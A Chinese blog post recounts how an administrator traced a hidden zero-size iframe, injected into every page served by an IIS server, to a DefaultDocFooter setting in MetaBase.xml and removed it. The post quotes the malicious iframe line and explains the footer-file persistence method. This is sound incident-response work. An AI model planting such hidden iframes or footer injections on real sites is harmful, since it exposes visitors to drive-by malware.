一台伺服器 幾乎所有網站打開網頁 甚至HTML網頁 都出現了

<iframe src="HTTP://xxxdfsfd/web.htm" height=0 width=0></iframe>

這種樣式的代碼 有的在頭部 有的在尾部 部分殺毒軟體打開會報毒

打開HTML或ASP PHP頁面 在源碼中怎麼也找不到這段代碼

分析原因

首先懷疑ARP掛馬,用防ARP的工具又沒有發現有arp欺騙

而且arp欺騙一般不會每次都被插入代碼,而是時有時無

而且使用HTTP://127.0.0.1 或者HTTP://localhost 訪問的時候也可以找到這段代碼

arp欺騙的可能排除。

然後就想到可能是JS被篡改,或者是其它的包含檔,查找後沒有發現被改的頁面 連新建的HTML頁面流覽的時候也會被插入這段代碼,那就只能是通過IIS掛上去的了。

備份iis資料然後重裝iis,代碼消失,將備份的iis恢復,問題又來了。

仔細尋找,問題應該出在IIS的設定檔上,打開設定檔,沒有發現那段代碼。

那很有可能是調用了某個檔,這個怎麼查啊,忽然想起了大名鼎鼎的Filemon

本地載了一個上傳到伺服器上,打開Filemon,資料太多了,過濾掉一些沒有用的

只留下iis的進程,資料還是很多,看來伺服器上的網站還是挺多人在訪問的。

關掉所有網站,建了一個測試網站anky 目錄為D:\www\ 在下面建了一個空白頁面test.htm

訪問一下這個頁面代碼被插進來了,再看一下Filemon 奇怪怎麼讀取C:\Inetpub\wwwroot\iisstart.htm

打開C:\Inetpub\wwwroot\iisstart.htm一看,裡面就躺著

<iframe src="HTTP://xxxdfsfd/web.htm" height=0 width=0></iframe>

把代碼刪除了留空,訪問test.htm 正常了,把C:\Inetpub\wwwroot\iisstart.htm刪除了再訪問

test.htm 出現 「讀取資料頁腳檔出錯」問題就出這裡了,看來是調用了

這個檔。

把C:\Inetpub\wwwroot\iisstart.htm清空就正常了,這樣怎麼行,解決問題當然要連根拔掉。

continue

有沒有可能是擴展造成的,到擴展中檢查了一遍全部都是正常的

當然 通過ISAPI 掛馬的也是存在的

左想右想最後還是覺得設定檔有問題

打開設定檔,設定檔在%windir%\system32\inetsrv\MetaBase.xml

用記事本打開,查找iisstart.htm 找到一行,開始以為是預設網站,後來一想不對啊

預設網站都刪除了,再仔細一看這句代碼為

DefaultDocFooter="FILE:C:\Inetpub\wwwroot\iisstart.htm"

刪除掉這一行,問題徹底解決了。
創作者介紹
創作者 shadow 的頭像
shadow

資訊園

shadow 發表在 痞客邦 留言(0) 人氣()